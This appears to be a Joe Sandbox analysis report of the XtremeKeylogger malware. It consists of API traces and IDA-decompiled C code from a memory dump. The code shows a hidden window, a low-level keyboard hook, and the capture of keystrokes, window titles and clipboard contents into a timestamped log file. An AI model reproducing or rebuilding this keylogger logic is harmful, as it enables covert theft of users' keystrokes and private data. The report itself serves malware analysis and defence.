Part of subcall function 00C852E8: RegQueryValueExW.ADVAPI32(?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000,00C853AA), ref: 00C8537A
Part of subcall function 00C852E8: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,?,?,?,80000001,00000000,00000000,00020019,?,00C853D4,?,SOFTWARE\,00000000), ref: 00C8538A

SendMessageA.USER32(00100164,0000C1F3,00000000,00000000), ref: 00C87888
SetClipboardViewer.USER32(00100164), ref: 00C87893

Part of subcall function 00C8384C: CreateThread.KERNEL32(00000000,00000000,00C87D60,00000000,?,?), ref: 00C83862
Part of subcall function 00C8384C: SetThreadPriority.KERNEL32(00000000,00000000,00000001,?,00000000,?,00C88DB8,00000000), ref: 00C8386B

Part of subcall function 00C8387C: TerminateThread.KERNEL32(00000000,00000001,?,XtremeKeylogger,00C878B4,00100164,0000C1F3,00000000,00000000,000000D0,00000000,00000000,00000002,00460000,00000007,000000D0), ref: 00C83883
Part of subcall function 00C8387C: CloseHandle.KERNEL32(00000000), ref: 00C8388F

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Part of subcall function 00C85084: WriteFile.KERNEL32(000000D0,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C87348: GetDesktopWindow.USER32 ref: 00C87390
Part of subcall function 00C87348: GetWindowRect.USER32(00000000), ref: 00C87396
Part of subcall function 00C87348: GetModuleHandleA.KERNEL32(00000000), ref: 00C8739D
Part of subcall function 00C87348: RegisterClassW.USER32(?), ref: 00C873A5
Part of subcall function 00C87348: CreateWindowExW.USER32(00000080,XtremeKeylogger,00C873DC,98000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C873CF

Strings

XtremeKeylogger, xrefs: 00C87754

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C87348, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
registry

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C87348(WCHAR* __eax, intOrPtr __edx) {
				char _v52;
				int _v56;
				int _v60;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;
				struct HWND__* _t21;
				WNDCLASSW* _t33;
				WCHAR* _t34;
				struct tagRECT* _t35;

				_t14 = __eax;
				_t35 =  &_v56;
				_t33 =  &_v52;
				_t33->style = 0;
				if(__edx != 0) {
					 *((intOrPtr*)(_t33 + 4)) = __edx;
				} else {
					 *((intOrPtr*)(_t33 + 4)) = E00C8732C;
				}
				_t33->cbClsExtra = 0;
				_t33->cbWndExtra = 0;
				_t33->hInstance = 0;
				_t33->hIcon = 0;
				_t33->hCursor = 0;
				_t33->hbrBackground = 0;
				_t33->lpszMenuName = 0;
				_t34 = _t14;
				_t33->lpszClassName = _t34;
				GetWindowRect(GetDesktopWindow(), _t35);
				_t17 = GetModuleHandleA(0);
				RegisterClassW(_t33);
				_t21 = CreateWindowExW(0x80, _t34, E00C873DC, 0x98000000, _v60, _v56, 0, 0, 0, 0, _t17, 0); // executed
				return _t21;
			}

APIs

GetDesktopWindow.USER32 ref: 00C87390
GetWindowRect.USER32(00000000), ref: 00C87396
GetModuleHandleA.KERNEL32(00000000), ref: 00C8739D
RegisterClassW.USER32(?), ref: 00C873A5
CreateWindowExW.USER32(00000080,XtremeKeylogger,00C873DC,98000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C873CF

Strings

XtremeKeylogger, xrefs: 00C87348, 00C873C9

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C86946, Relevance: 6.1, APIs: 4, Instructions: 55
windowfile

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 54%

			E00C86946(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				int _v32;
				int _v36;
				char _v40;
				intOrPtr _v44;
				char _v300;
				intOrPtr _v304;
				char _v308;
				char _v830;
				char _v1352;
				long _t143;
				void* _t149;
				void* _t151;
				CHAR* _t153;
				intOrPtr _t156;
				struct HHOOK__* _t159;
				void* _t165;
				void* _t173;
				void* _t174;
				void* _t180;
				void* _t181;
				void* _t190;
				void* _t191;
				void* _t194;
				void* _t200;
				void* _t209;
				void* _t210;
				void* _t219;
				void* _t220;
				void* _t226;
				void* _t235;
				void* _t236;
				int _t241;
				void* _t242;
				intOrPtr _t257;
				int _t260;
				void* _t270;
				void* _t271;
				int _t286;
				int _t287;
				struct HWND__* _t288;
				void* _t297;
				void* _t298;
				void* _t304;
				void* _t313;
				void* _t314;
				void* _t320;
				void* _t321;
				int _t328;
				void* _t330;
				void* _t331;
				void* _t340;
				void* _t341;
				void* _t348;
				void* _t349;
				void* _t358;
				void* _t359;
				void* _t368;
				void* _t369;
				void* _t375;
				void* _t376;
				void* _t385;
				void* _t386;
				int _t401;
				int _t402;
				struct HWND__* _t403;
				int _t415;
				int _t416;
				struct HWND__* _t417;
				int _t432;
				int _t433;
				struct HWND__* _t434;
				int _t449;
				int _t450;
				struct HWND__* _t451;
				void* _t460;
				void* _t461;
				int _t476;
				int _t477;
				struct HWND__* _t478;
				struct HHOOK__* _t485;
				int _t488;
				void* _t492;
				signed int _t493;
				long _t494;
				long _t496;
				long _t497;
				long _t498;
				long _t499;
				long _t500;
				void* _t504;
				void* _t507;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t514;
				void* _t517;
				void* _t519;
				void* _t520;
				void* _t521;
				void* _t524;
				void* _t525;
				void* _t526;
				void* _t527;
				void* _t528;
				void* _t531;
				void* _t537;
				intOrPtr _t539;
				long _t594;
				void* _t597;
				void* _t599;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v20 = 0;
				_v24 = 0;
				_v40 = 0;
				_t594 = _a16;
				_t592 = _a12;
				_t488 = _a8;
				_push(_t597);
				_push(0xc8727a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t597 + 0xfffffabc;
				_t143 = DefWindowProcA(_a4, _t488, _a12, _t594); // executed
				_v8 = _t143;
				_t599 = _t488 -  *0xc8ded4; // 0xc1f3
				if(_t599 != 0) {
					__eflags = _t488 -  *0xc8decc; // 0xc1f1
					if(__eflags != 0) {
						__eflags = _t488 - 0x308;
						if(_t488 != 0x308) {
							__eflags = _t488 -  *0xc8ded0; // 0xc1f2
							if(__eflags != 0) {
								__eflags = _t488 -  *0xc8ded8; // 0xc1f4
								if(__eflags != 0) {
									__eflags = _t488 -  *0xc8dedc; // 0xc1f5
									if(__eflags == 0) {
										__eflags =  *0xc8dee8;
										if( *0xc8dee8 != 0) {
											_t149 =  *0xc8dee8; // 0xd0
											SetFilePointer(_t149, 0, 0, 0);
											_t151 =  *0xc8dee8; // 0xd0
											SetEndOfFile(_t151);
											 *0xc8b0c8 = 0;
											 *0xc8b0cc = 0;
											__eflags =  *0xc8da4b - 1;
											if( *0xc8da4b == 1) {
												_t153 =  *0xc8b0c8; // 0x0
												E00C853EC(_t153, _t488, _t594);
											}
										}
									}
								} else {
									__eflags =  *0xc8b0c4;
									if( *0xc8b0c4 == 0) {
										_v8 = 0;
									} else {
										_t156 =  *0xc8ded8; // 0xc1f4
										_v8 = _t156 + 1;
									}
								}
							} else {
								__eflags =  *0xc8b0c4;
								if( *0xc8b0c4 != 0) {
									_t159 =  *0xc8b0c4; // 0x0
									UnhookWindowsHookEx(_t159);
								}
								 *0xc8b0c4 = 0;
							}
							goto L58;
						}
						__eflags =  *0xc8b0c4;
						if( *0xc8b0c4 == 0) {
							goto L58;
						}
						__eflags =  *0xc8b0c0 - 1;
						if( *0xc8b0c0 != 1) {
							_v16 = 0xc872d4;
							E00C8291C();
							_t165 = E00C8389C(0,  &_v36,  &_v16);
							__eflags = _t165 - 1;
							if(_t165 != 1) {
								goto L58;
							}
							__eflags = _v32;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									goto L58;
								}
								L43:
								__eflags =  *0xc8dff4;
								if( *0xc8dff4 == 0) {
									E00C81BD8( &_v40, 0xc872cc);
									_push( &_v12);
									_push(0);
									_push(E00C81D04(_v40) + _t232);
									_t235 = E00C81CF4(_v40);
									_t236 =  *0xc8dee8; // 0xd0
									_pop(_t513);
									E00C85084(_t236, _t513, _t235);
									_push( &_v12);
									_push(0);
									_t241 = E00C81D04(_v40) + _t240;
									__eflags = _t241;
									_t242 =  *0xc8dee8; // 0xd0
									_t514 = _t241;
									E00C85084(_t242, _t514, _t235);
								}
								E00C81BD8( &_v40, L"[CLIPBOARD] ---- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t170);
								_t173 = E00C81CF4(_v40);
								_t174 =  *0xc8dee8; // 0xd0
								_pop(_t504);
								E00C85084(_t174, _t504, _t173);
								E00C86890( &_v1352);
								_t180 = E00C82E48( &_v1352);
								_t181 =  *0xc8dee8; // 0xd0
								E00C85084(_t181, _t180 + _t180,  &_v1352, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t187);
								_t190 = E00C81CF4(_v40);
								_t191 =  *0xc8dee8; // 0xd0
								_pop(_t507);
								E00C85084(_t191, _t507, _t190);
								_t194 =  *0xc8dee8; // 0xd0
								E00C85084(_t194, _v36, _v16, 0,  &_v12);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t198);
								_t200 =  *0xc8dee8; // 0xd0
								_pop(_t509);
								E00C85084(_t200, _t509, _t190);
								E00C81BD8( &_v40, L"[CLIPBOARD END]");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t206);
								_t209 = E00C81CF4(_v40);
								_t210 =  *0xc8dee8; // 0xd0
								_pop(_t510);
								E00C85084(_t210, _t510, _t209);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t216);
								_t219 = E00C81CF4(_v40);
								_t220 =  *0xc8dee8; // 0xd0
								_pop(_t511);
								E00C85084(_t220, _t511, _t219);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t224);
								_t226 =  *0xc8dee8; // 0xd0
								_pop(_t512);
								E00C85084(_t226, _t512, _t219);
								 *0xc8dff4 = 0;
								goto L58;
							}
							__eflags = _v36;
							if(_v36 <= 0) {
								goto L58;
							}
							goto L43;
						}
						 *0xc8b0c0 = 0;
						goto L58;
					} else {
						E00C8291C();
						E00C81B78( &_v20);
						E00C81B78( &_v24);
						_t492 = _t594;
						E00C82914( &_v308, _t492);
						VirtualFree(_t492, 0, 0x8000);
						E00C868EC( &_v20);
						_t257 =  *0xc8dff8; // 0x0
						E00C81DBC(_t257, _v20);
						_t493 = _t492 & 0xffffff00 | __eflags != 0x00000000;
						__eflags = _t493 - 1;
						if(_t493 == 1) {
							E00C81BB4(0xc8dff8, _v20);
						}
						_t260 = E00C851C4(_v20, _t493, _t592, _t594);
						__eflags = _t260;
						if(_t260 == 0) {
							goto L58;
						}
						E00C85568(_t493,  &_v300, _v304, _t592, _t594,  &_v24, _v44);
						__eflags =  *0xc8dee8 - 0xffffffff;
						if( *0xc8dee8 == 0xffffffff) {
							goto L58;
						}
						__eflags = _t493 - 1;
						if(_t493 != 1) {
							L28:
							__eflags =  *0xc8dff5 - 1;
							if( *0xc8dff5 == 1) {
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t294);
								_t297 = E00C81CF4(_v40);
								_t298 =  *0xc8dee8; // 0xd0
								_pop(_t519);
								E00C85084(_t298, _t519, _t297);
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t302);
								_t304 =  *0xc8dee8; // 0xd0
								_pop(_t520);
								E00C85084(_t304, _t520, _t297);
								E00C81BD8( &_v40, L" --- ");
								_push( &_v12);
								_push(0);
								_push(E00C81D04(_v40) + _t310);
								_t313 = E00C81CF4(_v40);
								_t314 =  *0xc8dee8; // 0xd0
								_pop(_t521);
								E00C85084(_t314, _t521, _t313);
								E00C86890( &_v830);
								_t320 = E00C82E48( &_v830);
								_t321 =  *0xc8dee8; // 0xd0
								E00C85084(_t321, _t320 + _t320,  &_v830, 0,  &_v12);
								E00C81BD8( &_v40, 0xc872cc);
								_push( &_v12);
								_push(0);
								_t328 = E00C81D04(_v40) + _t327;
								__eflags = _t328;
								_t330 = E00C81CF4(_v40);
								_t331 =  *0xc8dee8; // 0xd0
								_t524 = _t328;
								E00C85084(_t331, _t524, _t330);
							}
							_push( &_v12);
							_push(0);
							_push(E00C81D04(_v24) + _t267);
							_t270 = E00C81CF4(_v24);
							_t271 =  *0xc8dee8; // 0xd0
							_pop(_t517);
							E00C85084(_t271, _t517, _t270);
							__eflags =  *0xc8b0b8;
							if( *0xc8b0b8 != 0) {
								__eflags =  *0xc8b0bc - 1;
								if( *0xc8b0bc == 1) {
									_t494 = VirtualAlloc(0, E00C81D04(_v24) + _t274, 0x1000, 0x40);
									_push(E00C81D04(_v24) + _t278);
									E00C82914(_t494, E00C81CF4(_v24));
									_t286 = E00C81D04(_v24) + _t285;
									__eflags = _t286;
									_t287 =  *0xc8dee0; // 0xc1f6
									_t288 =  *0xc8b0b8; // 0x0
									PostMessageA(_t288, _t287, _t286, _t494);
								}
							}
							 *0xc8dff5 = 0;
							 *0xc8dff4 = 0;
							goto L58;
						}
						__eflags =  *0xc8dff4;
						if( *0xc8dff4 == 0) {
							E00C81BD8( &_v40, L"\r\n\r\n");
							_push( &_v12);
							_push(0);
							_push(E00C81D04(_v40) + _t457);
							_t460 = E00C81CF4(_v40);
							_t461 =  *0xc8dee8; // 0xd0
							_pop(_t537);
							E00C85084(_t461, _t537, _t460);
							__eflags =  *0xc8b0b8;
							if( *0xc8b0b8 != 0) {
								__eflags =  *0xc8b0bc - 1;
								if( *0xc8b0bc == 1) {
									_t500 = VirtualAlloc(0, E00C81D04(_v40) + _t464, 0x1000, 0x40);
									_push(E00C81D04(_v40) + _t468);
									E00C82914(_t500, E00C81CF4(_v40));
									_t476 = E00C81D04(_v40) + _t475;
									__eflags = _t476;
									_t477 =  *0xc8dee0; // 0xc1f6
									_t478 =  *0xc8b0b8; // 0x0
									PostMessageA(_t478, _t477, _t476, _t500);
								}
							}
						}
						E00C81BD8( &_v40, 0xc872a4);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t337);
						_t340 = E00C81CF4(_v40);
						_t341 =  *0xc8dee8; // 0xd0
						_pop(_t525);
						E00C85084(_t341, _t525, _t340);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v20) + _t345);
						_t348 = E00C81CF4(_v20);
						_t349 =  *0xc8dee8; // 0xd0
						_pop(_t526);
						E00C85084(_t349, _t526, _t348);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t499 = VirtualAlloc(0, E00C81D04(_v20) + _t437, 0x1000, 0x40);
								_push(E00C81D04(_v20) + _t441);
								E00C82914(_t499, E00C81CF4(_v20));
								_t449 = E00C81D04(_v20) + _t448;
								__eflags = _t449;
								_t450 =  *0xc8dee0; // 0xc1f6
								_t451 =  *0xc8b0b8; // 0x0
								PostMessageA(_t451, _t450, _t449, _t499);
							}
						}
						E00C81BD8( &_v40, 0xc872b0);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t355);
						_t358 = E00C81CF4(_v40);
						_t359 =  *0xc8dee8; // 0xd0
						_pop(_t527);
						E00C85084(_t359, _t527, _t358);
						E00C81BD8( &_v40, L" --- ");
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t365);
						_t368 = E00C81CF4(_v40);
						_t369 =  *0xc8dee8; // 0xd0
						_pop(_t528);
						E00C85084(_t369, _t528, _t368);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t498 = VirtualAlloc(0, E00C81D04(_v40) + _t420, 0x1000, 0x40);
								_push(E00C81D04(_v40) + _t424);
								E00C82914(_t498, E00C81CF4(_v40));
								_t432 = E00C81D04(_v40) + _t431;
								__eflags = _t432;
								_t433 =  *0xc8dee0; // 0xc1f6
								_t434 =  *0xc8b0b8; // 0x0
								PostMessageA(_t434, _t433, _t432, _t498);
							}
						}
						E00C86890( &_v830);
						_t375 = E00C82E48( &_v830);
						_t376 =  *0xc8dee8; // 0xd0
						E00C85084(_t376, _t375 + _t375,  &_v830, 0,  &_v12);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t497 = VirtualAlloc(0, E00C82E48( &_v830) + _t406, 0x1000, 0x40);
								E00C82E48( &_v830);
								E00C82914(_t497,  &_v830);
								_t415 = E00C82E48( &_v830) + _t414;
								__eflags = _t415;
								_t416 =  *0xc8dee0; // 0xc1f6
								_t417 =  *0xc8b0b8; // 0x0
								PostMessageA(_t417, _t416, _t415, _t497);
							}
						}
						E00C81BD8( &_v40, 0xc872cc);
						_push( &_v12);
						_push(0);
						_push(E00C81D04(_v40) + _t382);
						_t385 = E00C81CF4(_v40);
						_t386 =  *0xc8dee8; // 0xd0
						_pop(_t531);
						E00C85084(_t386, _t531, _t385);
						__eflags =  *0xc8b0b8;
						if( *0xc8b0b8 != 0) {
							__eflags =  *0xc8b0bc - 1;
							if( *0xc8b0bc == 1) {
								_t496 = VirtualAlloc(0, E00C81D04(_v40) + _t389, 0x1000, 0x40);
								_push(E00C81D04(_v40) + _t393);
								E00C82914(_t496, E00C81CF4(_v40));
								_t401 = E00C81D04(_v40) + _t400;
								__eflags = _t401;
								_t402 =  *0xc8dee0; // 0xc1f6
								_t403 =  *0xc8b0b8; // 0x0
								PostMessageA(_t403, _t402, _t401, _t496);
							}
						}
						 *0xc8dff4 = 0;
						 *0xc8dff5 = 0;
						goto L28;
					}
				} else {
					if( *0xc8b0c4 != 0) {
						_t485 =  *0xc8b0c4; // 0x0
						UnhookWindowsHookEx(_t485);
					}
					 *0xc8b0c4 = SetWindowsHookExW(0xd, E00C86748, GetModuleHandleA(0), 0);
					L58:
					_pop(_t539);
					 *[fs:eax] = _t539;
					_push(E00C87281);
					E00C81B78( &_v40);
					return E00C81B90( &_v24, 2);
				}
			}

0x00c86951
0x00c86952
0x00c86953
0x00c86956
0x00c86959
0x00c8695c
0x00c8695f
0x00c86962
0x00c86965
0x00c8696a
0x00c8696b
0x00c86970
0x00c86973
0x00c8697d
0x00c86982
0x00c86985
0x00c8698b
0x00c869c2
0x00c869c8
0x00c86f8e
0x00c86f94
0x00c871bb
0x00c871c1
0x00c871e0
0x00c871e6
0x00c87203
0x00c87209
0x00c8720b
0x00c87212
0x00c8721a
0x00c87220
0x00c87225
0x00c8722b
0x00c87230
0x00c8723a
0x00c87244
0x00c8724b
0x00c8724d
0x00c87252
0x00c87252
0x00c8724b
0x00c87212
0x00c871e8
0x00c871e8
0x00c871ef
0x00c871fe
0x00c871f1
0x00c871f1
0x00c871f7
0x00c871f7
0x00c871ef
0x00c871c3
0x00c871c3
0x00c871ca
0x00c871cc
0x00c871d2
0x00c871d2
0x00c871d9
0x00c871d9
0x00000000
0x00c871c1
0x00c86f9a
0x00c86fa1
0x00000000
0x00000000
0x00c86fa7
0x00c86fae
0x00c86fc1
0x00c86fcf
0x00c86fdc
0x00c86fe1
0x00c86fe3
0x00000000
0x00000000
0x00c86fe9
0x00c86fed
0x00c86ffb
0x00000000
0x00000000
0x00c87001
0x00c87001
0x00c87008
0x00c87012
0x00c8701a
0x00c8701b
0x00c87027
0x00c8702b
0x00c87034
0x00c87039
0x00c8703a
0x00c87042
0x00c87043
0x00c8704d
0x00c8704d
0x00c87052
0x00c87057
0x00c87058
0x00c87058
0x00c87065
0x00c8706d
0x00c8706e
0x00c8707a
0x00c8707e
0x00c87085
0x00c8708a
0x00c8708b
0x00c87096
0x00c870a7
0x00c870b6
0x00c870bb
0x00c870c8
0x00c870d0
0x00c870d1
0x00c870dd
0x00c870e1
0x00c870ea
0x00c870ef
0x00c870f0
0x00c87101
0x00c87106
0x00c8710e
0x00c8710f
0x00c8711b
0x00c8711e
0x00c87123
0x00c87124
0x00c87131
0x00c87139
0x00c8713a
0x00c87146
0x00c8714a
0x00c87151
0x00c87156
0x00c87157
0x00c87164
0x00c8716c
0x00c8716d
0x00c87179
0x00c8717d
0x00c87186
0x00c8718b
0x00c8718c
0x00c87194
0x00c87195
0x00c871a1
0x00c871a4
0x00c871a9
0x00c871aa
0x00c871af
0x00000000
0x00c871af
0x00c86fef
0x00c86ff3
0x00000000
0x00000000
0x00000000
0x00c86ff9
0x00c86fb0
0x00000000
0x00c869ce
0x00c869d9
0x00c869e1
0x00c869e9
0x00c869f8
0x00c869fd
0x00c86a0a
0x00c86a12
0x00c86a17
0x00c86a1f
0x00c86a24
0x00c86a27
0x00c86a2a
0x00c86a34
0x00c86a34
0x00c86a3c
0x00c86a41
0x00c86a43
0x00000000
0x00000000
0x00c86a65
0x00c86a6a
0x00c86a71
0x00000000
0x00000000
0x00c86a77
0x00c86a7a
0x00c86df8
0x00c86df8
0x00c86dff
0x00c86e0d
0x00c86e15
0x00c86e16
0x00c86e22
0x00c86e26
0x00c86e2f
0x00c86e34
0x00c86e35
0x00c86e3d
0x00c86e3e
0x00c86e4a
0x00c86e4d
0x00c86e52
0x00c86e53
0x00c86e60
0x00c86e68
0x00c86e69
0x00c86e75
0x00c86e79
0x00c86e80
0x00c86e85
0x00c86e86
0x00c86e91
0x00c86ea2
0x00c86eb1
0x00c86eb6
0x00c86ec3
0x00c86ecb
0x00c86ecc
0x00c86ed6
0x00c86ed6
0x00c86edc
0x00c86ee3
0x00c86ee8
0x00c86ee9
0x00c86ee9
0x00c86ef1
0x00c86ef2
0x00c86efe
0x00c86f02
0x00c86f09
0x00c86f0e
0x00c86f0f
0x00c86f14
0x00c86f1b
0x00c86f1d
0x00c86f24
0x00c86f3f
0x00c86f4b
0x00c86f59
0x00c86f67
0x00c86f67
0x00c86f6a
0x00c86f70
0x00c86f76
0x00c86f76
0x00c86f24
0x00c86f7b
0x00c86f82
0x00000000
0x00c86f82
0x00c86a80
0x00c86a87
0x00c86a95
0x00c86a9d
0x00c86a9e
0x00c86aaa
0x00c86aae
0x00c86ab5
0x00c86aba
0x00c86abb
0x00c86ac0
0x00c86ac7
0x00c86ac9
0x00c86ad0
0x00c86aeb
0x00c86af7
0x00c86b05
0x00c86b13
0x00c86b13
0x00c86b16
0x00c86b1c
0x00c86b22
0x00c86b22
0x00c86ad0
0x00c86ac7
0x00c86b2f
0x00c86b37
0x00c86b38
0x00c86b44
0x00c86b48
0x00c86b4f
0x00c86b54
0x00c86b55
0x00c86b5d
0x00c86b5e
0x00c86b6a
0x00c86b6e
0x00c86b75
0x00c86b7a
0x00c86b7b
0x00c86b80
0x00c86b87
0x00c86b89
0x00c86b90
0x00c86bab
0x00c86bb7
0x00c86bc5
0x00c86bd3
0x00c86bd3
0x00c86bd6
0x00c86bdc
0x00c86be2
0x00c86be2
0x00c86b90
0x00c86bef
0x00c86bf7
0x00c86bf8
0x00c86c04
0x00c86c08
0x00c86c0f
0x00c86c14
0x00c86c15
0x00c86c22
0x00c86c2a
0x00c86c2b
0x00c86c37
0x00c86c3b
0x00c86c42
0x00c86c47
0x00c86c48
0x00c86c4d
0x00c86c54
0x00c86c56
0x00c86c5d
0x00c86c78
0x00c86c84
0x00c86c92
0x00c86ca0
0x00c86ca0
0x00c86ca3
0x00c86ca9
0x00c86caf
0x00c86caf
0x00c86c5d
0x00c86cba
0x00c86ccb
0x00c86cda
0x00c86cdf
0x00c86ce4
0x00c86ceb
0x00c86ced
0x00c86cf4
0x00c86d12
0x00c86d1a
0x00c86d2b
0x00c86d3c
0x00c86d3c
0x00c86d3f
0x00c86d45
0x00c86d4b
0x00c86d4b
0x00c86cf4
0x00c86d58
0x00c86d60
0x00c86d61
0x00c86d6d
0x00c86d71
0x00c86d78
0x00c86d7d
0x00c86d7e
0x00c86d83
0x00c86d8a
0x00c86d8c
0x00c86d93
0x00c86dae
0x00c86dba
0x00c86dc8
0x00c86dd6
0x00c86dd6
0x00c86dd9
0x00c86ddf
0x00c86de5
0x00c86de5
0x00c86d93
0x00c86dea
0x00c86df1
0x00000000
0x00c86df1
0x00c8698d
0x00c86994
0x00c86996
0x00c8699c
0x00c8699c
0x00c869b8
0x00c87257
0x00c87259
0x00c8725c
0x00c8725f
0x00c87267
0x00c87279
0x00c87279

APIs

Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
Part of subcall function 00C85568: ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
Part of subcall function 00C85568: MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
Part of subcall function 00C85568: ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C8389C: OpenClipboard.USER32 ref: 00C838BD
Part of subcall function 00C8389C: GetClipboardData.USER32(0000000D), ref: 00C838DA
Part of subcall function 00C8389C: GlobalFix.KERNEL32(00000000), ref: 00C838FA
Part of subcall function 00C8389C: GlobalSize.KERNEL32(00000000), ref: 00C83905
Part of subcall function 00C8389C: GlobalUnWire.KERNEL32(00000000), ref: 00C83925
Part of subcall function 00C8389C: CloseClipboard.USER32 ref: 00C83943

Part of subcall function 00C85084: WriteFile.KERNEL32(000000D0,?,00000002,?,?), ref: 00C850AA

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

DefWindowProcA.USER32(?,?,?,?), ref: 00C8697D
UnhookWindowsHookEx.USER32(00000000), ref: 00C8699C
GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00C8727A), ref: 00C869A5
SetWindowsHookExW.USER32(0000000D,Function_00006748,00000000,00000000), ref: 00C869B3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00C8727A), ref: 00C86A0A

Part of subcall function 00C868EC: GetForegroundWindow.USER32 ref: 00C86914
Part of subcall function 00C868EC: GetWindowTextW.USER32(00000000,?,00002712), ref: 00C8692A

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86AE6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86B22
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86BA6
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86BE2
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,?,?,?,00000000), ref: 00C86C73
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86CAF
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,?,?), ref: 00C86D0D
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86D4B
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00C86DA9
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86DE5
VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,00000000,?,?,?,?,00000000,00008000,00000000,00C8727A), ref: 00C86F3A
PostMessageA.USER32(00000000,0000C1F6,00000000,00000000), ref: 00C86F76

Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

UnhookWindowsHookEx.USER32(00000000), ref: 00C871D2
SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000000,00000000,00C8727A), ref: 00C87220
SetEndOfFile.KERNEL32(000000D0,000000D0,00000000,00000000,00000000,00000000,00C8727A), ref: 00C8722B

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
